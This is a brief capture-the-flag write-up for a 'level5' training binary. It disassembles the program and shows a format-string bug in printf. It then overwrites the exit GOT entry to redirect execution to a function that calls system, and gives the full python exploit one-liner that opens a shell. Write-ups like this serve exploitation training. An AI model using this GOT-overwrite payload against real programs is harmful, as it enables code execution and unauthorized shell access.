As usual start with
>>objdump -d level5
	080484a4 <o>:
	 80484a4:	55                   	push   %ebp
	 80484a5:	89 e5                	mov    %esp,%ebp
	 80484a7:	83 ec 18             	sub    $0x18,%esp
	 80484aa:	c7 04 24 f0 85 04 08 	movl   $0x80485f0,(%esp)
	 80484b1:	e8 fa fe ff ff       	call   80483b0 <system@plt>
	 80484b6:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)
	 80484bd:	e8 ce fe ff ff       	call   8048390 <_exit@plt>

	080484c2 <n>:
	 80484c2:	55                   	push   %ebp
	 80484c3:	89 e5                	mov    %esp,%ebp
	 80484c5:	81 ec 18 02 00 00    	sub    $0x218,%esp
	 80484cb:	a1 48 98 04 08       	mov    0x8049848,%eax
	 80484d0:	89 44 24 08          	mov    %eax,0x8(%esp)
	 80484d4:	c7 44 24 04 00 02 00 	movl   $0x200,0x4(%esp)
	 80484db:	00
	 80484dc:	8d 85 f8 fd ff ff    	lea    -0x208(%ebp),%eax
	 80484e2:	89 04 24             	mov    %eax,(%esp)
	 80484e5:	e8 b6 fe ff ff       	call   80483a0 <fgets@plt>
	 80484ea:	8d 85 f8 fd ff ff    	lea    -0x208(%ebp),%eax
	 80484f0:	89 04 24             	mov    %eax,(%esp)
	 80484f3:	e8 88 fe ff ff       	call   8048380 <printf@plt>
	 80484f8:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)
	 80484ff:	e8 cc fe ff ff       	call   80483d0 <exit@plt>

	08048504 <main>:
	 8048504:	55                   	push   %ebp
	 8048505:	89 e5                	mov    %esp,%ebp
	 8048507:	83 e4 f0             	and    $0xfffffff0,%esp
	 804850a:	e8 b3 ff ff ff       	call   80484c2 <n>
	 804850f:	c9                   	leave
	 8048510:	c3                   	ret
See that there is a call to exit after printf now, so we can't rewrite saved eip.
Also see 'o' function which have system call and exit.
Look through the dump more closely.
In plt part there is map to dynamically linked exit function
	080483d0 <exit@plt>:
	 80483d0:	ff 25 38 98 04 08    	jmp    *0x8049838
	 80483d6:	68 28 00 00 00       	push   $0x28
	 80483db:	e9 90 ff ff ff       	jmp    8048370 <_init+0x3c>
Idea is to rewrite value in *0x8049838 to call 'o' function instead of real exit.
It's also possible because in 'o' function '_exit' is called instead of 'exit', which will be rewritten.
The rest is pretty much the same as in previous 2 levels, except we need to replace 2 bytes
instead of 1, so we place address in which should be lesser value at first place and another one
at second: 
>> (python -c "print '\x08\x04\x98\x39'[::-1] + '\x08\x04\x98\x38'[::-1] + 'A' * 124 + '%4\$hhn' + 'A' * 32 + '%5\$hhn'"; cat) | ~/level5
